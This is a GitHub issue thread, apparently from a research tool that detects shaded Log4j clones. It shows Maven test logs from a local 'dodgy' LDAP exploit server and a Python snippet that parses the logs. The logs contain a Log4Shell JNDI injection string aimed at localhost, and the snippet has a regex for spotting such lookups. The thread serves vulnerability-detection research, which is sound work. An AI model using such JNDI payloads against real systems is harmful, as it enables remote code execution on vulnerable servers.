Closed wtwhite closed 12 months ago
Running `java -jar dodgy-ldap-server.jar` as root causes the test to succeed on the vulnerable artifact, as intended.
Next: See whether specifying a >1024 port number on both sides gets this working outside of root.
`mvn clean test` now works as expected in my Linux VM, but hung at the following point (after successfully creating `foo` and reporting test success) on `piccolo`:

```
--snip--
[INFO] -------------------------------------------------------
[INFO]  T E S T S
[INFO] -------------------------------------------------------
[INFO] Running ConfirmVulnerabilitiesTests
Sep 21, 2023 4:30:11 PM null
INFO: [21/Sep/2023:16:30:11 +1200] CONNECT conn=0 from="127.0.0.1:57124" to="127.0.0.1:9389"
Sep 21, 2023 4:30:11 PM null
INFO: [21/Sep/2023:16:30:11 +1200] BIND REQUEST conn=0 op=0 msgID=1 version=3 dn="" authType="SIMPLE"
Sep 21, 2023 4:30:11 PM null
INFO: [21/Sep/2023:16:30:11 +1200] BIND RESULT conn=0 op=0 msgID=1 resultCode=0 etime=1.042
Sep 21, 2023 4:30:11 PM null
INFO: [21/Sep/2023:16:30:11 +1200] SEARCH REQUEST conn=0 op=1 msgID=2 base="exe" scope=0 filter="(objectClass=*)" attrs="ALL"
Sep 21, 2023 4:30:11 PM null
INFO: [21/Sep/2023:16:30:11 +1200] SEARCH RESULT conn=0 op=1 msgID=2 resultCode=34 diagnosticMessage="Unable to perform the search because an error occurred while attempting to parse base DN 'exe': The provided string could not be decoded as a DN because no equal sign was found after the RDN attribute 'exe'." etime=5.901 entriesReturned=0
java.lang.NullPointerException
	at Exploit$OperationInterceptor.sendExeResult(Exploit.java:75)
	at Exploit$OperationInterceptor.processSearchResult(Exploit.java:62)
	at com.unboundid.ldap.listener.interceptor.InMemoryOperationInterceptorRequestHandler.processSearchRequest(InMemoryOperationInterceptorRequestHandler.java:831)
	at com.unboundid.ldap.listener.StartTLSRequestHandler.processSearchRequest(StartTLSRequestHandler.java:309)
	at com.unboundid.ldap.listener.LDAPListenerClientConnection.run(LDAPListenerClientConnection.java:582)
16:30:11.009 [main] ERROR ConfirmVulnerabilitiesTests - ${jndi:ldap://127.0.0.1:9389/exe}
[INFO] Tests run: 1, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 6.498 s - in ConfirmVulnerabilitiesTests
```
I suspect running the exploit triggered an intrusion detection system on `piccolo`. I have emailed ECS to let them know and to ask for an exemption. Leaving the issue closed for now.
See https://github.com/jensdietrich/shadedetector/issues/36#issuecomment-1728681909.
The upshot is that my run-script generator auto-senses `testSignalWhenVulnerable` to be `failure` instead of `success`, resulting in clones being missed.
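The misclassification described in the last comment comes from reading the console output: the run above passes (Surefire reports `Failures: 0, Errors: 0`) even though the dodgy LDAP server prints a `NullPointerException` stack trace and Log4j logs an `ERROR` line carrying the JNDI lookup string. The following is an added illustration, not shadedetector's own run-script generator, of why deciding the signal from Surefire's summary line is more robust than treating any exception or ERROR line as a failed run. The sample output is constructed from the lines quoted above and trimmed; `naive_signal`, `surefire_signal` and `jndi_lookups` are hypothetical names.

```python
import re

# Constructed sample of a Maven Surefire run, modelled on the console output quoted
# in this issue: the test passes, but the LDAP server's stack trace and Log4j's
# ERROR line (which echoes the JNDI lookup) appear in the same stream.
SAMPLE_RUN = """\
[INFO] Running ConfirmVulnerabilitiesTests
Sep 21, 2023 4:30:11 PM null
INFO: [21/Sep/2023:16:30:11 +1200] CONNECT conn=0 from="127.0.0.1:57124" to="127.0.0.1:9389"
INFO: [21/Sep/2023:16:30:11 +1200] SEARCH RESULT conn=0 op=1 msgID=2 resultCode=34 entriesReturned=0
java.lang.NullPointerException
\tat Exploit$OperationInterceptor.sendExeResult(Exploit.java:75)
16:30:11.009 [main] ERROR ConfirmVulnerabilitiesTests - ${jndi:ldap://127.0.0.1:9389/exe}
[INFO] Tests run: 1, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 6.498 s - in ConfirmVulnerabilitiesTests
"""

# Surefire's per-suite summary line, as seen in the output above.
SUREFIRE_SUMMARY = re.compile(
    r"Tests run: (\d+), Failures: (\d+), Errors: (\d+), Skipped: (\d+)"
)
# A JNDI lookup token as Log4j would log it; used only to flag what the run exercised.
JNDI_LOOKUP = re.compile(r"\$\{jndi:([^}]*)\}")


def naive_signal(output: str) -> str:
    """Heuristic that calls the run a failure if any exception or ERROR line appears.

    This is the kind of auto-sensing that misreads the run above: the stack trace
    comes from the test's own LDAP server, not from the test failing.
    """
    if re.search(r"Exception|\bERROR\b", output):
        return "failure"
    return "success"


def surefire_signal(output: str) -> str:
    """Decide the outcome from Surefire's own summary line(s), aggregated over suites.

    Returns 'unknown' when no summary is present, e.g. when the build hung or
    crashed before reporting, so that such runs are not silently counted either way.
    """
    summaries = SUREFIRE_SUMMARY.findall(output)
    if not summaries:
        return "unknown"
    tests_run = sum(int(run) for run, _, _, _ in summaries)
    failed = sum(int(fail) + int(err) for _, fail, err, _ in summaries)
    if tests_run == 0:
        return "unknown"
    return "failure" if failed else "success"


def jndi_lookups(output: str) -> list[str]:
    """Return the JNDI lookup targets that were logged during the run.

    Useful as a sanity check that the vulnerable code path actually fired,
    independently of whether the test harness reported success.
    """
    return JNDI_LOOKUP.findall(output)


if __name__ == "__main__":
    print("naive:   ", naive_signal(SAMPLE_RUN))      # failure (wrong)
    print("surefire:", surefire_signal(SAMPLE_RUN))   # success
    print("lookups: ", jndi_lookups(SAMPLE_RUN))
```

The difference matters for the clone search: a generator that learns `failure` as the "vulnerable" signal from a run like this will then reject every clone whose test output looks the same, which is exactly the missed-clones outcome reported above.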